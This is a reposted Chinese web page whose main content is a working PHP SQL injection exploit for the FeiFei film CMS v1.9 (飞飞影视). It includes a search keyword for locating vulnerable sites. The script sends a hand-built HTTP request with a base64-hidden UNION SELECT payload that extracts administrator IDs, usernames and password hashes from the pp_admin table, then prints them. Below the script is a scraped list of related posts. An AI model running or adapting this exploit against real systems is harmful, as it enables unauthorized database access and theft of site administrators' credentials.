飞飞影视php 漏洞,飞飞影视SQL injection exploit[转]
/**
* 飞飞影视管理系统 SQL injection
* 飞飞影视系统PHP版 v1.9 injection exploit
* by:www.08sec.com fans
* keyword “Powered by www.ff84.com”
*/
error_reporting(E_ERROR);
set_time_limit(0);
if ($argc<3) {
print_r(‘
——————————————————
Usage: php ‘.$argv[0].’ host path
host: target server (ip/hostname),without”http://”
path: path to ff84cms
Example:
php ‘.$argv[0].’ localhost /
——————————————————-
‘);
die;
}
$host=$argv[1];
$path=$argv[2];
$html=”;
$cookie=””;
$agent=” User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1″;
$content =””;
$data = “POST /?s=vod-read-id-1″.base64_decode(‘JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==’).”html HTTP/1.1\r\n”;
$data .= “Host: “.$host.”\r\n”;
//$data .=”Cookie: “.$cookie.”\r\n”;
$data .= “User-Agent: “.$agent. “\r\n”;
$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”;
$data .= “Accept-Language: zh-cn,zh;q=0.5\r\n”;
$data .= “Accept-Encoding: gzip,deflate\r\n”;
$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;
$data .= “Connection: keep-alive\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “Content-Length: “.strlen($content).”\r\n\r\n”;
$data .= $content.”\r\n”;
Sendpack($data);
if (!eregi(“Tpl”,$html)){
// echo $packet.”\r\n”;
// echo $html.”\r\n”;
die(“Exploit failed…”);
}else{
$pattern=”/@(.*)@/i”;
preg_match($pattern,$html,$pg);
echo “$pg[1]\r\n\r\n”;
echo “\r\nExploit succeeded…\r\n”;
}
Function sendpack ($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80′);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
飞飞影视php 漏洞,飞飞影视SQL injection exploit[转]相关推荐
- 飞飞php影视系统漏洞,飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料...
文章作者:honglousy 昨天整的 论坛旁站上的程序,发现用的人还真不少, 简单的写了个exp.无聊之作... /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP ...
- 飞飞php影视系统漏洞,飞飞影视最新版前台无限制getshell
public function fetch($templateFile='',$charset='',$contentType='',$display=false) { //die('errorcod ...
- SQL Injection
摘要 以用户或者外部不可信来源的输入动态构造SQL查询的命令,将可能改变SQL查询语句本来的语义,从而导致执行任意的SQL命令. 缺陷描述 SQL injection 错误在以下情况下 ...
- web 漏洞入门之 —— SQL 注入教程
SQL 注入是最常见.最被人们熟知的 web 漏洞.根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. ...
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...
- 网络***技术开篇——SQL Injection
http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被***公开 ...
- 【Web安全】关于SQL Injection和盲注的探索(DVWA)
文章目录 1 SQL Injection 1.1 解释 1.2 手工注入思路 1.3 low 2 SQL Injection (Blind) 2.1 SQL盲注与普通的SQL注入区别 2.2 low ...
- SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛 ...
- DVWA学习(二)SQL Injection(Blind)
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是 ...
最新文章
- 数据结构_Search
- 【Linux】一步一步学Linux——dpkg-trigger命令(276)
- 【学习笔记】DAG / 一般有向图的支配树 / 灭绝树
- ATM柜员机JAVA课程设计_ATM柜员机学年论文设计(Java课程设计)
- 数字化园区、智慧园区、物业管理、园区设备、房屋资源、维修业务、巡查管理、招商管理、商业租售管理,收支管理,合同管理,人员管理,日常维护,巡检管理,报检报修、物业驾驶舱、axure原型、rp原型
- BZOJ3240 NOI2013矩阵游戏(数论)
- 解决IDEA中Maven加载依赖包慢的问题
- react-native Navigator 填坑
- max std value 宏_常用宏定义
- easyui框架tabs控件
- java基本的商品管理系统
- 写在NPL小书出版之时
- UWB基本原理分析2
- Spectral Algorithm
- Android通过Canvas手绘一个折线图
- 项目型销售之定义与特点简介
- 开源 iOS 项目分类索引大全 - 待整理
- php实现关键字搜索,php关键字搜索
- 单踪示波器转换成多踪显示的电路设计
- linux 如何查找命令的路径
热门文章
- 河北滹沱河流域上演喜鹊戏金雕
- LeetCode——517. 超级洗衣机(Super Washing Machines)[困难]——分析及代码(C++)
- 天空的心事,只有云懂
- Java课程设计学生考勤管理
- SD/SDHC/SDXC区别
- Servlet.service() for servlet jsp threw exception
- Cell期刊论文:为什么计算机人脸识别注定超越人类?(祖母论与还原论之争)...
- c语言期末网上考试题目回岔开吗,C语言期末考试题目.doc
- repo: error: no branches ready for upload 问题解决方法
- Java程序设置的目的_java程序设计教学大纲的课程性质与目的.doc